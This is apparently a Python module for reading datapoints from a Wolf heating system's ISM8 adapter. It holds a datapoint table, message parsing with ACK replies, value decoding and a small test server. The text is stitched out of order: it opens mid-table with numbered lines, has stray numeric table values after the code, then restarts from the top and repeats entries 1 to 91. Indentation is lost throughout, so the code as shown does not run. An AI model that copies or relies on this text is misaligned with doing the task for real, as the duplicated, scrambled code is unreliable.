40: ('HG4', 'Stoerung', 'DPT_Switch', False, ''),
41: ('HG4', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
42: ('HG4', 'Brennerleistung', 'DPT_Scaling', False, '%'),
43: ('HG4', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
44: ('HG4', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
45: ('HG4', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
46: ('HG4', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
47: ('HG4', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
48: ('HG4', 'Status Brenner', 'DPT_Switch', False, ''),
49: ('HG4', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
50: ('HG4', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
51: ('HG4', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
52: ('HG4', 'Anlagendruck', 'DPT_Value_Pres', False, 'a'),
53: ('BM1', 'Stoerung', 'DPT_Switch', False, ''),
54: ('BM1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
55: ('BM1', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
56: ('BM1', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
57: ('BM1', 'Programmwahl Heizkreis', 'DPT_HVACMode', True, ''),
58: ('BM1', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
59: ('BM1', 'Heizkreis Zeitprogramm 1', 'DPT_Switch', True, ''),
60: ('BM1', 'Heizkreis Zeitprogramm 2', 'DPT_Switch', True, ''),
61: ('BM1', 'Heizkreis Zeitprogramm 3', 'DPT_Switch', True, ''),
62: ('BM1', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
63: ('BM1', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
64: ('BM1', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
65: ('BM1', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
66: ('BM1', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
67: ('BM2', 'Stoerung', 'DPT_Switch', False, ''),
68: ('BM2', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
69: ('BM2', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
70: ('BM2', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
71: ('BM2', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
72: ('BM2', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
73: ('BM2', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
74: ('BM2', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
75: ('BM2', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
76: ('BM2', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
77: ('BM2', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
78: ('BM2', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
79: ('BM2', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
80: ('BM3', 'Stoerung', 'DPT_Switch', False, ''),
81: ('BM3', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
82: ('BM3', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
83: ('BM3', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
84: ('BM3', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
85: ('BM3', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
86: ('BM3', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
87: ('BM3', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
88: ('BM3', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
89: ('BM3', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
90: ('BM3', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
91: ('BM3', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
92: ('BM3', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
93: ('BM4', 'Stoerung', 'DPT_Switch', False, ''),
94: ('BM4', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
95: ('BM4', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
96: ('BM4', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
97: ('BM4', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
98: ('BM4', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
99: ('BM4', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
100: ('BM4', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
101: ('BM4', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
102: ('BM4', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
103: ('BM4', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
104: ('BM4', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
105: ('BM4', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
106: ('KM', 'Stoerung', 'DPT_Switch', False, ''),
107: ('KM', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
108: ('KM', 'Gesamtmodulationsgrad', 'DPT_Scaling', False, '%'),
109: ('KM', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
110: ('KM', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
111: ('KM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
112: ('KM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
113: ('KM', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
114: ('MM1', 'Stoerung', 'DPT_Switch', False, ''),
115: ('MM1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
116: (
'MM1', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
117: ('MM1', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
118: ('MM1', 'Status Ausgang A1', 'DPT_Enable', False, ''),
119: ('MM1', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
120: ('MM1', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
121: ('MM2', 'Stoerung', 'DPT_Switch', False, ''),
122: ('MM2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
123: (
'MM2', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
124: ('MM2', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
125: ('MM2', 'Status Ausgang A1', 'DPT_Enable', False, ''),
126: ('MM2', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
127: ('MM2', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
128: ('MM3', 'Stoerung', 'DPT_Switch', False, ''),
129: ('MM3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
130: (
'MM3', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
131: ('MM3', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
132: ('MM3', 'Status Ausgang A1', 'DPT_Enable', False, ''),
133: ('MM3', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
134: ('MM3', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
135: ('SM', 'Stoerung', 'DPT_Switch', False, ''),
136: ('SM', 'Warmwassertemperatur Solar 1', 'DPT_Value_Temp', False,
'C'),
137: ('SM', 'Temperatur Kollektor 1', 'DPT_Value_Temp', False, 'C'),
138: ('SM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
139: ('SM', 'Eingang E2 (Durchfluss)', 'DPT_Value_Volume_Flow', False,
'l/h'),
140: ('SM', 'Eingang E3', 'DPT_Value_Temp', False, 'C'),
141: ('SM', 'Status Solarkreispumpe SKP1', 'DPT_Switch', False, ''),
142: ('SM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
143: ('SM', 'Status Ausgang A2', 'DPT_Enable', False, ''),
144: ('SM', 'Status Ausgang A3', 'DPT_Enable', False, ''),
145: ('SM', 'Status Ausgang A4', 'DPT_Enable', False, ''),
146: ('SM', 'Durchfluss', 'DPT_Value_Volume_Flow', False, 'l/h'),
147: ('SM', 'aktuelle Leistung', 'DPT_Power', False, 'kW'),
148: ('CWL', 'Stoerung', 'DPT_Switch', False, ''),
149: ('CWL', 'Programm', 'DPT_DHWMode', True, ''),
150: ('CWL', 'Zeitprogramm 1', 'DPT_Switch', True, ''),
151: ('CWL', 'Zeitprogramm 2', 'DPT_Switch', True, ''),
152: ('CWL', 'Zeitprogramm 3', 'DPT_Switch', True, ''),
153: ('CWL', 'Intensivlueftung AN_AUS', 'DPT_Switch', True, ''),
154: ('CWL', 'Intensivlueftung Startdatum', 'DPT_Date', True, ''),
155: ('CWL', 'Intensivlueftung Enddatum', 'DPT_Date', True, ''),
156: ('CWL', 'Intensivlueftung Startzeit', 'DPT_TimeOfDay', True, ''),
157: ('CWL', 'Intensivlueftung Endzeit', 'DPT_TimeOfDay', True, ''),
158: ('CWL', 'Zeitw. Feuchteschutz AN_AUS', 'DPT_Switch', True, ''),
159: ('CWL', 'Zeitw. Feuchteschutz Startdatum', 'DPT_Date', True, ''),
160: ('CWL', 'Zeitw. Feuchteschutz Enddatum', 'DPT_Date', True, ''),
161: (
'CWL', 'Zeitw. Feuchteschutz Startzeit', 'DPT_TimeOfDay', True,
''),
162: (
'CWL', 'Zeitw. Feuchteschutz Endzeit', 'DPT_TimeOfDay', True, ''),
163: ('CWL', 'Lueftungsstufe', 'DPT_Scaling', False, '%'),
164: ('CWL', 'Ablufttemperatur', 'DPT_Value_Temp', False, 'C'),
165: ('CWL', 'Frischlufttemperatur', 'DPT_Value_Temp', False, 'C'),
166: ('CWL', 'Durchsatz Zuluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
167: ('CWL', 'Durchsatz Abluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
168: ('CWL', 'Bypass Initialisierung', 'DPT_Bool', False, ''),
169: ('CWL', 'Bypass oeffnet_offen', 'DPT_Bool', False, ''),
170: ('CWL', 'Bypass schliesst_geschlossen', 'DPT_Bool', False, ''),
171: ('CWL', 'Bypass Fehler', 'DPT_Bool', False, ''),
172: ('CWL', 'Frost Status: Init_Warte', 'DPT_Bool', False, ''),
173: ('CWL', 'Frost Status: Kein Frost', 'DPT_Bool', False, ''),
174: ('CWL', 'Frost Status: Vorwaermer', 'DPT_Bool', False, ''),
175: ('CWL', 'Frost Status: Fehler', 'DPT_Bool', False, ''),
176: ('BWL', 'Stoerung', 'DPT_Switch', False, ''),
177: ('BWL', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
178: ('BWL', 'Heizleistung', 'DPT_Power', False, 'W'),
179: ('BWL', 'Kuehlleistung', 'DPT_Power', False, 'W'),
180: ('BWL', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
181: ('BWL', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
182: ('BWL', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
183: ('BWL', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
184: ('BWL', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
185: ('BWL', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
186: ('BWL', 'Status Aux-Pumpe', 'DPT_Switch', False, ''),
187: ('BWL', '3W-Umschaltventil HZ_WW', 'DPT_OpenClose', False, ''),
188: ('BWL', '3W-Umschaltventil HZ_K', 'DPT_OpenClose', False, ''),
189: ('BWL', 'Status E-Heizung', 'DPT_Switch', False, ''),
190: ('BWL', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
191: ('BWL', 'Leistungsaufnahme', 'DPT_Power', False, 'W'),
192: ('CWL', 'Filterwarnung aktiv', 'DPT_Switch', False, '-'),
193: ('CWL', 'Filterwarnung zuruecksetzen', 'DPT_Switch', True, '-'),
194: ('BM1', '1x Warmwasserladung (gobal)', 'DPT_Switch', True, '-'),
195: ('SM', 'Tagesertrag', 'DPT_ActiveEnergy', False, 'Wh'),
196: ('SM', 'Gesamtertrag', 'DPT_ActiveEnergy_kWh', False, 'kWh'),
197: ('HG1', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
198: ('HG1', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
199: ('HG1', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
200: ('HG2', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
201: ('HG2', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
202: ('HG2', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
203: ('HG3', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
204: ('HG3', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
205: ('HG3', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
206: ('HG4', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
207: ('HG4', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
208: ('HG4', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
209: ('KM', 'Gesamtmodulationsgradvorgabe', 'DPT_Scaling', True, '%'),
210: ('KM', 'Sammlertemperaturvorgabe', 'DPT_Value_Temp', True, 'C')
}
@staticmethod
def get_device(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_DEVICE]
else:
return None
@staticmethod
def get_name(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_NAME]
else:
return None
@staticmethod
def get_type(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
else:
return None
@staticmethod
def get_unit(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_UNIT]
else:
return None
@staticmethod
def get_all_sensors():
""" returns pointer all possible values of ISM8 datapoints """
return Ism8.DATAPOINTS
def factory(self):
"""
returns reference to itself for using in protocol_factory with
create_server
"""
return self
def connection_made(self, transport):
""" is called as soon as an ISM8 connects to server """
_peername = transport.get_extra_info('peername')
self._LOGGER.info("Connection from ISM8: %s", _peername)
self._transport = transport
self._connected = True
def data_received(self, data):
""" is called whenever data is ready """
_header_ptr = 0
msg_length = 0
self._LOGGER.debug('Raw data received: %s', data)
while _header_ptr < len(data):
_header_ptr = data.find(Ism8.ISM_HEADER, _header_ptr)
if _header_ptr >= 0:
if len(data[_header_ptr:]) >= 9:
# smallest processable data:
# hdr plus 5 bytes=>at least 9 bytes
msg_length = 256 * data[_header_ptr + 4] + data[
_header_ptr + 5]
# msg_length comes in bytes 4 and 5
else:
msg_length = len(data) + 1
# 2 possible outcomes here: Buffer is to short for message=>abort
# buffer is larger => than msg: process 1 message,
# then continue loop
if len(data) < _header_ptr + msg_length:
self._LOGGER.debug(
"Buffer shorter than expected / broken Message.")
self._LOGGER.debug("Discarding: %s ", data[_header_ptr:])
# setting Ptr to end of data will end loop
_header_ptr = len(data)
else:
# send ACK to ISM8 according to API: ISM Header,
# then msg-length(17), then ACK w/ 2 bytes from original msg
ack_msg = bytearray(Ism8.ISM_HEADER)
ack_msg.append(0x00)
ack_msg.append(0x11)
ack_msg.extend(Ism8.ISM_CONN_HEADER)
ack_msg.extend(Ism8.ISM_ACK)
ack_msg[12] = data[_header_ptr + 12]
ack_msg[13] = data[_header_ptr + 13]
self._LOGGER.debug('Sending ACK: %s ', ack_msg)
self._transport.write(ack_msg)
self.process_msg(
data[_header_ptr + 10:_header_ptr + msg_length])
# process message without header (first 10 bytes)
_header_ptr += msg_length
# prepare to get next message; advance Ptr to next Msg
def process_msg(self, msg):
"""
Processes received datagram(s) according to ISM8 API specification
into message length, command, values delivered
"""
max_dp = msg[4] * 256 + msg[5]
# number of DATAPOINTS are coded into bytes 4 and 5 of message
i = 0
# byte counter
dp_nbr = 1
# datapoint counter
while dp_nbr <= max_dp:
self._LOGGER.debug('DP {0:d} / {1:d} in datagram:'.format(
dp_nbr, max_dp))
dp_id = msg[i + 6] * 256 + msg[i + 7]
# dp_command = msg[i + 8]
# to be implemented for writing values to ISM8
dp_length = msg[i + 9]
dp_raw_value = bytearray(msg[i + 10:i + 10 + dp_length])
self._LOGGER.debug('Processing DP-ID %s, %s bytes: message: %s',
dp_id, dp_length, dp_raw_value)
self.decode_datapoint(dp_id, dp_length, dp_raw_value)
# now advance byte counter and datapoint counter
dp_nbr += 1
i = i + 10 + dp_length
def decode_datapoint(self, dp_id, length, raw_bytes):
"""
decodes a single value according to API;
receives raw bytes from network and
decodes them according to API data type
"""
result = 0
for single_byte in raw_bytes:
result = result * 256 + int(single_byte)
if dp_id not in Ism8.DATAPOINTS:
self._LOGGER.error("unknown datapoint: %s, data:%s",
dp_id, result)
return
dp_type = Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
if (length == 1) and dp_type in ("DPT_Switch",
"DPT_Bool",
"DPT_Enable",
"DPT_OpenClose"):
# take 1st bit and cast to Bool
self._dp_values.update({dp_id: bool(result & 1)})
elif (length == 1) and (dp_type == "DPT_HVACMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Comfort'})
elif result == 2:
self._dp_values.update({dp_id: 'Standby'})
elif result == 3:
self._dp_values.update({dp_id: 'Economy'})
elif result == 4:
self._dp_values.update({dp_id: 'Building Protection'})
elif (length == 1) and (dp_type == "DPT_Scaling"):
# take byte value and multiply by 100/255
self._dp_values.update({dp_id: 100 / 255 * result})
elif (length == 1) and (dp_type == "DPT_DHWMode"):
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'LegioProtect'})
elif result == 2:
self._dp_values.update({dp_id: 'Normal'})
elif result == 3:
self._dp_values.update({dp_id: 'Reduced'})
elif result == 4:
self._dp_values.update({dp_id: 'Off'})
elif (length == 1) and (dp_type == "DPT_HVACContrMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Heat'})
elif result == 2:
self._dp_values.update({dp_id: 'Morning Warmup'})
elif result == 3:
self._dp_values.update({dp_id: 'Cool'})
elif result == 4:
self._dp_values.update({dp_id: 'Night Purge'})
elif result == 5:
self._dp_values.update({dp_id: 'Precool'})
elif result == 6:
self._dp_values.update({dp_id: 'Off'})
elif result == 7:
self._dp_values.update({dp_id: 'Test'})
elif result == 8:
self._dp_values.update({dp_id: 'Emergency Heat'})
elif result == 9:
self._dp_values.update({dp_id: 'Fan Only'})
elif result == 10:
self._dp_values.update({dp_id: 'Free Cool'})
elif result == 11:
self._dp_values.update({dp_id: 'Ice'})
elif result == 12:
self._dp_values.update({dp_id: 'Maximum Heating Mode'})
elif result == 13:
self._dp_values.update({dp_id: 'Economic Heat/Cool Mode'})
elif result == 14:
self._dp_values.update({dp_id: 'Dehumidification'})
elif result == 15:
self._dp_values.update({dp_id: 'Calibration Mode'})
elif result == 16:
self._dp_values.update({dp_id: 'Emergency Cool Mode'})
elif result == 17:
self._dp_values.update({dp_id: 'Emergency Steam Mode'})
elif result == 20:
self._dp_values.update({dp_id: 'NoDem'})
elif (length == 2) and (dp_type in ("DPT_Value_Temp",
"DPT_Value_Tempd",
"DPT_Tempd",
"DPT_Value_Pres",
"DPT_Power",
"DPT_Value_Volume_Flow"
)):
_sign = (result & 0b1000000000000000) >> 15
_exponent = (result & 0b0111100000000000) >> 11
_mantisse = result & 0b0000011111111111
self._LOGGER.debug(
'binary format {0:b} -> s:{1:b} , m:{2:b} , e:{3:b}'
.format(result, _sign, _mantisse, _exponent))
if _sign == 1:
_mantisse = -(~(_mantisse - 1) & 0x07ff)
self._dp_values.update(
{dp_id: (0.01 * (2 ** _exponent) * _mantisse)})
elif (length == 4) and (dp_type in ("DPT_ActiveEnergy",
"DPT_ActiveEnergy_kWh"
)):
self._dp_values.update({dp_id: result})
else:
self._LOGGER.error('datatype not implemented: %s ', dp_type)
return
if dp_id in self._dp_values.keys():
self._LOGGER.debug('decoded DP %s : %s = %s\n',
dp_id, Ism8.DATAPOINTS[dp_id],
self._dp_values[dp_id])
else:
self._LOGGER.error('could not decode DP %s : %s\n',
dp_id, Ism8.DATAPOINTS[dp_id])
def connection_lost(self, exc):
"""
Is called when connection ends. closes socket.
"""
self._LOGGER.debug('ISM8 closed the connection.Stopping')
self._connected = False
self._transport.close()
def read(self, dp_id):
"""
Returns sensor value from private array of sensor-readings
"""
if dp_id in self._dp_values.keys():
return self._dp_values[dp_id]
else:
return None
if __name__ == "__main__":
_LOGGER = logging.getLogger(__name__)
logging.basicConfig()
_LOGGER.setLevel(logging.DEBUG)
# for testing purposes only, relies on debug output
myProtocol = Ism8()
for keys, values in myProtocol.get_all_sensors().items():
print("%s: %s\n" % (keys, values))
_eventloop = asyncio.get_event_loop()
coro = _eventloop.create_server(myProtocol.factory, '', 12004)
_server = _eventloop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
_LOGGER.debug('Waiting for ISM8 connection on %s',
_server.sockets[0].getsockname())
_eventloop.run_forever()
| 51.9375 | 80 | 0.537552 | """
Module for gathering info from Wolf Heating System via ISM8 adapter
"""
import logging
import asyncio
class Ism8(asyncio.Protocol):
"""
This protocol class is invoked to listen to message from ISM8 module and
feed data into internal data array
"""
ISM_HEADER = b'\x06\x20\xf0\x80'
ISM_CONN_HEADER = b'\x04\x00\x00\x00'
ISM_ACK = b'\xF0\x86\x00\x00\x00\x00\x00'
ISM_POLL = b'\x06\x20\xF0\x80\x00\x16\x04\x00\x00\x00\xF0\xD0'
# constant byte arrays for creating ISM8 network messages
DP_DEVICE = 0
# index of Wolf ISM main device name
DP_NAME = 1
# index of datapoint name
DP_TYPE = 2
# index of datapoint type (as described in Wolf API)
DP_RW = 3
# index of R/W-flag (writing not implemented so far)
DP_UNIT = 4
# index of unit description, if applicable
DATAPOINTS = {
1: ('HG1', 'Stoerung', 'DPT_Switch', False, ''),
2: ('HG1', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
3: ('HG1', 'Brennerleistung', 'DPT_Scaling', False, '%'),
4: ('HG1', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
5: ('HG1', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
6: ('HG1', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
7: ('HG1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
8: ('HG1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
9: ('HG1', 'Status Brenner', 'DPT_Switch', False, ''),
10: ('HG1', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
11: ('HG1', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
12: ('HG1', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
13: ('HG1', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
14: ('HG2', 'Stoerung', 'DPT_Switch', False, ''),
15: ('HG2', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
16: ('HG2', 'Brennerleistung', 'DPT_Scaling', False, '%'),
17: ('HG2', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
18: ('HG2', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
19: ('HG2', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
20: ('HG2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
21: ('HG2', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
22: ('HG2', 'Status Brenner', 'DPT_Switch', False, ''),
23: ('HG2', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
24: ('HG2', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
25: ('HG2', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
26: ('HG2', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
27: ('HG3', 'Stoerung', 'DPT_Switch', False, ''),
28: ('HG3', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
29: ('HG3', 'Brennerleistung', 'DPT_Scaling', False, '%'),
30: ('HG3', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
31: ('HG3', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
32: ('HG3', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
33: ('HG3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
34: ('HG3', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
35: ('HG3', 'Status Brenner', 'DPT_Switch', False, ''),
36: ('HG3', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
37: ('HG3', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
38: ('HG3', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
39: ('HG3', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
40: ('HG4', 'Stoerung', 'DPT_Switch', False, ''),
41: ('HG4', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
42: ('HG4', 'Brennerleistung', 'DPT_Scaling', False, '%'),
43: ('HG4', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
44: ('HG4', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
45: ('HG4', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
46: ('HG4', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
47: ('HG4', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
48: ('HG4', 'Status Brenner', 'DPT_Switch', False, ''),
49: ('HG4', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
50: ('HG4', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
51: ('HG4', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
52: ('HG4', 'Anlagendruck', 'DPT_Value_Pres', False, 'a'),
53: ('BM1', 'Stoerung', 'DPT_Switch', False, ''),
54: ('BM1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
55: ('BM1', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
56: ('BM1', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
57: ('BM1', 'Programmwahl Heizkreis', 'DPT_HVACMode', True, ''),
58: ('BM1', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
59: ('BM1', 'Heizkreis Zeitprogramm 1', 'DPT_Switch', True, ''),
60: ('BM1', 'Heizkreis Zeitprogramm 2', 'DPT_Switch', True, ''),
61: ('BM1', 'Heizkreis Zeitprogramm 3', 'DPT_Switch', True, ''),
62: ('BM1', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
63: ('BM1', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
64: ('BM1', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
65: ('BM1', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
66: ('BM1', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
67: ('BM2', 'Stoerung', 'DPT_Switch', False, ''),
68: ('BM2', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
69: ('BM2', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
70: ('BM2', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
71: ('BM2', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
72: ('BM2', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
73: ('BM2', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
74: ('BM2', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
75: ('BM2', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
76: ('BM2', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
77: ('BM2', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
78: ('BM2', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
79: ('BM2', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
80: ('BM3', 'Stoerung', 'DPT_Switch', False, ''),
81: ('BM3', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
82: ('BM3', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
83: ('BM3', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
84: ('BM3', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
85: ('BM3', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
86: ('BM3', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
87: ('BM3', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
88: ('BM3', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
89: ('BM3', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
90: ('BM3', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
91: ('BM3', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
